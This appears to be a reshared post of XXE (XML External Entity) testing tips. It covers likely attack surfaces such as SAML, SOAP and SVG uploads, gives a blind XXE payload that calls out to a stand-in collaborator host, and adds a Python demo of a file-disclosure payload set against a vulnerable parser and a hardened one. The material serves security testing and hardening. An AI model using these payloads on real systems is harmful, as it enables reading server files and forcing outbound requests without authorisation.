I'm sharing this information with you. I found it surfing the internet and it's very helpful...
XXE -> XML External Entity
+ When it comes to identifying XXE issues, you can find these vulnerabilities in far more places than the obvious XML endpoints.
Here's a list of the top 5 features and areas you should look for when testing for XXE issues:
1. XML APIs - Check whether the target already consumes XML. If it only advertises JSON, resend the request with Content-Type: application/xml (or text/xml) and an XML body; many frameworks pick the parser from that header, so the JSON endpoint may quietly accept XML too.
2. SOAP APIs - SOAP is XML by definition, so every SOAP endpoint is a candidate. Add a DOCTYPE with an external entity to the envelope and reference it from a field that is reflected or processed.
3. SAML Authentication - SAMLResponse and SAMLRequest parameters are base64-encoded XML. Decode, insert the payload, re-encode and submit; the identity provider or service provider has to parse it before it can validate the signature.
4. HTML parsing (e.g. converting HTML to another file type) - HTML-to-document converters frequently hand the input to an XML parser, so a DOCTYPE in the submitted HTML reaches that parser.
5. SVG file loading - SVG is XML. If the application accepts SVG uploads and parses them (for example to render, resize or convert the image), put the DOCTYPE and entity reference inside the SVG and look for the entity content in the rendered output or for an out-of-band callback.
These areas often conceal XXE vulnerabilities waiting to be uncovered.
The easiest way to test for blind XXE (where nothing the parser expands is reflected back to you) is to make the parser fetch a remote resource you control, such as a Burp Collaborator host, and watch for the DNS or HTTP interaction:
<?xml version="1.0" ?>
<!DOCTYPE root [
<!ENTITY % ext SYSTEM "http://BURP_COLLABORATOR[.]burpcollaborator[.]net/x"> %ext;
]>
<root/>
This uses a parameter entity (%ext;) referenced from inside the internal DTD subset, so the fetch happens while the DTD is being processed, before the parser reaches any element. If the parser is not allowed to load external entities you will see no interaction at all, which is itself the result you want when verifying a fix.
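As an added example that is not part of the original post, here is a Python script contrasting two parser configurations against the same in-band file-disclosure payload: an xml.sax parser with external general entity resolution switched on (the setting that makes classic XXE work, and the one many XXE-prone stacks ship with), and a hardened expat parser that rejects any DOCTYPE outright, so no entity can ever be declared. The target file is a constructed temporary file standing in for something like /etc/passwd; the function and variable names are hypothetical. It assumes Python 3.7.1 or later (where xml.sax disables external entities by default) on a POSIX system, since the file:// URL is built from a POSIX path.

```python
"""XXE: a parser that resolves external entities vs one that refuses DOCTYPE."""
import io
import os
import tempfile
import xml.sax
from xml.parsers import expat
from xml.sax.handler import feature_external_ges

# Constructed stand-in for the file an attacker would target (e.g. /etc/passwd).
SECRET = "root:x:0:0:root:/root:/bin/bash"


def file_disclosure_payload(path: str) -> bytes:
    """Classic in-band XXE: declare a general entity backed by a local file and
    reference it in element content so the parser echoes the file back.
    Assumes a POSIX path, which yields a file:///... URL."""
    return (
        '<?xml version="1.0"?>'
        f'<!DOCTYPE data [<!ENTITY xxe SYSTEM "file://{path}">]>'
        '<data>&xxe;</data>'
    ).encode()


class _TextCollector(xml.sax.ContentHandler):
    """Collects character data so we can see what the parser expanded."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_vulnerable(xml_bytes: bytes) -> str:
    """Parser configured the way many XXE-prone stacks ship: external general
    entities are fetched and expanded. Python's xml.sax has this off by default
    since 3.7.1; it is deliberately switched on here to show the failure mode."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, True)  # the dangerous setting
    handler = _TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.chunks)


def parse_hardened(xml_bytes: bytes) -> str:
    """Hardened variant: refuse any DOCTYPE, so no internal, external or
    parameter entity can be declared at all (the approach defusedxml takes).
    Raises ValueError on a DOCTYPE; returns the document's text otherwise."""
    chunks = []
    parser = expat.ParserCreate()

    def forbid_doctype(name, sysid, pubid, has_internal_subset):
        raise ValueError(f"DOCTYPE '{name}' rejected: DTDs are not allowed")

    parser.StartDoctypeDeclHandler = forbid_doctype
    parser.CharacterDataHandler = chunks.append
    parser.Parse(xml_bytes, True)
    return "".join(chunks)


def demo() -> dict:
    """Run both parsers against the same payload and report what each did."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write(SECRET)
        secret_path = fh.name
    try:
        payload = file_disclosure_payload(secret_path)
        leaked = parse_vulnerable(payload)          # file content comes back
        try:
            parse_hardened(payload)
            rejected = False
        except ValueError:
            rejected = True                         # DOCTYPE refused up front
        benign = parse_hardened(b'<?xml version="1.0"?><data>hello</data>')
    finally:
        os.unlink(secret_path)
    return {"leaked": leaked, "hardened_rejected": rejected, "benign": benign}


if __name__ == "__main__":
    print(demo())
```

Rejecting the DOCTYPE is the blunt, reliable fix: it kills in-band, blind and billion-laughs variants in one move, at the cost of breaking documents that legitimately need a DTD. If you must keep DTDs, the narrower option is to leave feature_external_ges off (the Python default) and additionally disable parameter entity parsing, since the out-of-band payload above never needs a general entity at all.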
Payloads and examples - XXE Injection cheat sheet at
XXE may be hiding where you least expect it - happy hunting! 😁